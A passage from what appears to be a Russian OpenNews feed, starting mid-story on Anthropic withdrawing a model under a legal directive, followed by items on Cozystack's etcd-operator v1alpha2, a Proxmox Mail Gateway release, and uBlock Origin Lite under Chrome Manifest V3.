Компания Anthropic подчинилась юридически обязательной директиве, но не согласна с тем, что обнаружение узкоспециализированного потенциального обхода защиты является основанием для отзыва коммерческой модели, развёрнутой для сотен миллионов пользователей, считает произошедшее недоразумением и работает над восстановлением доступа. До урегулирования ситуации новые сеансы в продуктах Claude будут запускаться с Opus 4.8 или выбранной пользователем AI-моделью, а существующие сеансы с Fable 5 будут завершены с выводом ошибки.

1. Главная ссылка к новости
2. OpenNews: При помощи AI-модели Mythos выявлены 23 тысячи уязвимостей в открытом ПО
3. OpenNews: AI-модель Claude Mythos не продемонстрировала особых достижений при поиске уязвимостей в Curl
4. OpenNews: Служба здравоохранения Великобритании намерена закрыть свои репозитории с открытым кодом из-за AI
5. OpenNews: Anthropic анонсировал AI-модель Claude Mythos, умеющую создавать рабочие эксплоиты
6. OpenNews: За апрель в Firefox устранено 423 уязвимости

Главное изменение в новом etcd-operator - отказ от StatefulSet для управления узлами. Теперь etcd-operator напрямую работает со штатным Membership API etcd (MemberAdd, MemberPromote и MemberRemove) и сам добавляет участников, повышает learner до голосующего узла и выводит узлы из кворума, что даёт etcd-operator полный контроль над составом кластера.

Параллельно разработчики проекта etcd развивают с нуля собственный официальный etcd-operator. По функциональности официальный etcd-operator пока уступает варианту от проекта Cozystack. Так как прежняя реализация etcd-operator уже работает в рабочих окружениях и используется в Cozystack и Kamaji, её развитие было продолжено отдельно от официальной реализации от проекта etcd.

Развиваемый проектом Cozystack вариант управляет кластерами etcd через два ресурса. EtcdCluster описывает желаемое состояние: число реплик, версию etcd, параметры хранилища, TLS, аутентификацию и настройки etcd. EtcdMember создаётся для каждого узла кластера и владеет его Pod и PVC. В отличие от типовых решений etcd-operator не использует StatefulSet и обслуживает независимо Pod и PVC каждого узла. Состав кластера меняется через API Membership etcd: etcd-operator добавляет новые узлы как learner (MemberAdd), затем повышает их до голосующих участников (MemberPromote). Удаление проходит через операцию MemberRemove, с корректным выводом из кворума. При приостановке работы кластера узлы сохраняют свою идентичность.

Основные возможности:

• развёртывание кластера и масштабирование в обе стороны, по одному узлу за раз: новые узлы стартуют в режиме learner, удаление корректно выводит их из кворума;
• остановка кластера без потери данных (spec.replicas: 0) и возобновление работы с теми же идентификаторами кластера и узлов;
• хранение данных в PVC по умолчанию или в tmpfs, если данные можно восстановить заново; при потере Pod оператор автоматически пересоздаёт узлы с хранилищем в памяти;
• раздельная настройка TLS для клиентских и межузловых соединений: можно подключить свои сертификаты или поручить оператору выпуск и продление сертификатов через cert-manager;
• аутентификация с единственным пользователем root; его учётные данные задаются через хранилище учётных данных ("Secret");
• создание снапшотов в S3 или PVC через ресурс EtcdSnapshot и восстановление кластера из снапшота при первом развёртывании;
• автоматический PodDisruptionBudget, который не даёт операциям чистки нарушить кворум;
• валидация спецификаций средствами apiserver через CEL-выражения в CRD, без webhook и зависимости от cert-manager;
• подресурс /scale для kubectl scale и VerticalPodAutoscaler, порт метрик 2381, проброс привязок и topologySpreadConstraint;
• плагин kubectl-etcd для повседневных задач (day-2 operations) после развёртывания кластера.

Изменения по сравнению со старой реализацией (v1alpha1):

• API-группа сменилась с etcd.aenix.io на etcd-operator.cozystack.io;
• вместо StatefulSet оператор использует отдельный ресурс EtcdMember для каждого узла;
• произвольный словарь spec.options заменён типизированным набором параметров: quota-backend-bytes, режим и интервал автокомпактификации, snapshot-count;
• ресурс EtcdBackup переименован в EtcdSnapshot, семантика сохранена;
• валидация перенесена с webhook на CEL-правила в CRD;
• сервис кластера переведён в режим headless, чтобы у узлов были стабильные DNS-имена.

Миграция проходит на месте с помощью etcd-migrate. Инструмент адаптирует работающий кластер старого оператора без переноса данных, перезапуска Pod и потери кворума, меняя только владельцев объектов, метки и аннотации. После этого новый оператор берёт управление на себя. Клиенты, которые обращаются к кластеру по DNS-имени, продолжают работать без изменений.

Реализация etcd-operator от Cozystack закрывает большинство пунктов плана развития официального etcd-оператора проекта etcd:

1. Создание нового кластера etcd, например из 3 или 5 узлов, с указанной версией etcd — реализовано.
2. Определение состояния работоспособности кластера — реализовано.
3. Поддержка TLS-шифрования соединений, включая продление сертификатов — реализовано.
4. Обновление в пределах патч-версий или на одну минорную версию — реализовано частично: значение spec.version применяется только к новым узлам.
5. Масштабирование в обе стороны, например 1 -> 3 -> 5 узлов и обратно — реализовано.
6. Настройка параметров etcd через флаги или переменные окружения — реализовано как закрытый типизированный набор параметров.
7. Восстановление одного отказавшего члена кластера, если кворум сохраняется — реализовано частично: автоматической замены членов с повреждённым PVC пока нет.
8. Восстановление после отказа нескольких членов кластера и потери кворума — не реализовано, работа запланирована.
9. Создание резервной копии кластера по запросу — реализовано.
10. Периодическое резервное копирование кластера — сознательно вынесено за рамки оператора: периодические снапшоты предлагается запускать штатным CronJob.

Кроме того, v1alpha2 даёт возможности, которых нет в плане развития официального оператора:

• остановка кластера до нуля реплик, пауза и возобновление с сохранением идентичности кластера и узлов;
• хранилище в памяти (tmpfs) с автоматической заменой узлов силами оператора;
• валидация на стороне apiserver через CEL, без webhook и зависимости от сертификатов;
• автоматический PodDisruptionBudget для голосующих узлов;
• подресурс /scale с заполненным status.selector, чтобы напрямую работали kubectl scale и VerticalPodAutoscaler.targetRef;
• проброс параметров планирования affinity и topologySpreadConstraints, а также объединение additionalMetadata во всех объектах, которые создаёт оператор;
• инструмент миграции с прежнего оператора без остановки кластера;
• плагин kubectl-etcd для эксплуатационных задач.

1. Главная ссылка к новости
2. OpenNews: Проект etcd-await-election для запуска процессов с учётом выбора лидирующего экземпляра
3. OpenNews: Первый альфа-выпуск etcd-оператора для Kubernetes
4. OpenNews: Разработка распределённого хранилища etcd переведена в организацию CNCF
5. OpenNews: Утечка параметров аутентификации через незащищённые серверы etcd
6. OpenNews: Выпуск распределенной системы хранения конфигурации etcd 3.0

Установочный ISO-образ доступен для свободной загрузки. Специфичные для дистрибутива компоненты открыты под лицензией AGPLv3. Для установки обновлений доступен как платный репозиторий Enterprise, так и два бесплатных репозитория, которые отличаются уровнем стабилизации обновлений. Системная часть дистрибутива базируется на пакетной базе Debian. Возможна установка компонентов Proxmox Mail Gateway поверх уже работающих серверов на базе Debian.

Proxmox Mail Gateway функционирует как прокси-сервер, выступающий в роли шлюза между внешней сетью и внутренним почтовым сервером на базе MS Exchange, Lotus Domino или Postfix. Имеется возможность управления всеми входящими и исходящими потоками почтовой переписки. Все логи переписки разбираются и доступны для анализа через web-интерфейс. Предоставляются как графики для оценки общей динамики, так и различные отчёты и формы для получения информации о конкретных письмах и статусе доставки. Поддерживается создание кластерных конфигураций для обеспечения высокой доступности (ведение синхронизированного резервного сервера, данные синхронизируются через SSH-туннель) или балансировки нагрузки.

Предоставляется набор средств для обеспечения защиты, фильтрации спама, фишинга и вирусов. Для блокирования вредоносных вложений применяется ClamAV и база Google Safe Browsing, а против спама предлагается комплекс мер на основе SpamAssassin, включающий поддержку обратной проверки отправителя, SPF, DNSBL, серые списки, систему байесовской классификации и блокировку по базе спамерских URI. Для легитимной корреспонденции предоставляется гибкая система фильтров, позволяющих определять правила обработки почты в зависимости от домена, получателя/отправителя, времени получения и типа содержимого.

Основные новшества:

• Осуществлена синхронизация с пакетной базой Debian 13.5. Ядро Linux обновлено до выпуска 7.0. Реализация файловой системы ZFS обновлена до OpenZFS 2.4. Обновлены версии системы фильтрации спама SpamAssassin 4.0.2, антивирусного пакета ClamAV 1.4.4 и СУБД PostgreSQL 17.
• Улучшен web-интерфейс для управлением помещением проблемных писем в карантин. Интерфейс оптимизирован для работы как со стационарных компьютеров, так и с мобильных устройств. Пользователям предоставлена возможность пометки просмотренными писем, помещённых в карантин из совместно используемых почтовых ящиков, для того чтобы не проводить двойную проверку разными людьми. В отчёте о помещении в карантин теперь показывается не только финальный спамерский вес, но и по-отдельности положительные и отрицательные составляющие для более ясного понимания причины фильтрации письма.

  Добавлена опция для загрузки изображений, присутствующих в помещённых в карантин письмах, только после явного запроса их показа нажатием кнопки "Load Images". В панель администратора добавлена опция "Copy Link" для получения ссылки для доступа к письму, находящемуся в карантине.

• Добавлена поддержка шифрования резервных копий на стороне клиента и управления ключами, используемыми для шифрования. В данном режиме шифруются не только резервируемые данные, но и сопутствующие метаданные, такие как настройки email, правила фильтрации и статистика. Имеется опциональная возможность задания мастер ключа для восстановления.
• Добавлена опция для инициирования проверки резервной копии и просмотра состояния шифрования и проверки для каждого снапшота.
• Реализована поддержка добавления объявлений, показываемых перед входом в интерфейс администрирования, например, для вывода примечаний об использовании.
• Добавлена поддержка сохранения в лог для каждого письма адреса отправителя, преданного во время SMTP-сеанса, а также декодированного содержимого заголовков From, To и Subject для проведения аудита.

1. Главная ссылка к новости
2. OpenNews: Выпуск Proxmox VE 9.2, дистрибутива для организации работы виртуальных серверов
3. OpenNews: Доступен дистрибутив Proxmox Backup Server 4.2
4. OpenNews: Представлен Proxmox Datacenter Manager 1.0
5. OpenNews: Выпуск дистрибутива Proxmox Mail Gateway 8.2

Участники проекта uBlock Origin рекомендовали пользователям Chrome перейти на другие браузеры или переключиться на дополнение uBlock Origin Lite, которое развивается автором uBlock Origin и представляет собой вариант uBlock Origin, переведённый на предложенный в третьей версии манифеста Chrome декларативный API (declarativeNetRequest). Поддержка второй версии манифеста Chrome присутствует в Firefox и Safari, а также будет сохранена в браузерах Brave и Opera на базе движка Chromium.

Третья версия манифеста Chrome, определяющего возможности и ресурсы, доступные для дополнений, написанных с использованием API WebExtensions, разработана в рамках инициативы по упрощению создания безопасных и высокопроизводительных дополнений. Основное недовольство третьей версией манифеста вызвано переводом в режим только для чтения API webRequest, позволявшего подключать собственные обработчики, имеющие полный доступ к сетевым запросам и способные на лету модифицировать трафик. Вместо API webRequest в третьей версии манифеста добавлен ограниченный по своим возможностям API declarativeNetRequest, предоставляющий доступ к встроенному движку для фильтрации, самостоятельно обрабатывающему правила блокировки, не разрешающему использовать собственные алгоритмы фильтрации.

Дополнение uBlock Origin Lite (uBOL) реализует лишь часть функциональности uBlock Origin. В uBlock Origin Lite оказалось проблематично перенести динамические фильтры контента и URL, фильтры HTTP-заголовков, средства для отключения скриптов, шрифтов и мультимедийных элементов большого размера в привязке к отдельным сайтам, многие опции фильтров (strict1p, strict3p, domain, redirect-rule, removeparam), защиту от манипуляций с DNS для обхода блокировки. Из-за необходимости получения дополнительных полномочий в uBlock Origin Lite по умолчанию отключены косметические фильтры для замены содержимого на странице ("##"), подстановки скриптов на сайты ("##+js"), фильтров для перенаправления запросов ("redirect="), фильтров заголовков CSP (Content Security Policy) и фильтров для удаления параметров запросов ("removeparam=").

1. Главная ссылка к новости
2. OpenNews: Релиз Chrome 149
3. OpenNews: Google анонсировал скорое прекращение поддержки второй версии манифеста в Chrome
4. OpenNews: Подготовлены варианты uBlock Origin и AdGuard с поддержкой третьей версии манифеста Chrome
5. OpenNews: В Chrome появилось предупреждение о скором прекращении поддержки uBlock Origin
6. OpenNews: Google отключил дополнение uBlock Origin в каталоге Chrome Web Store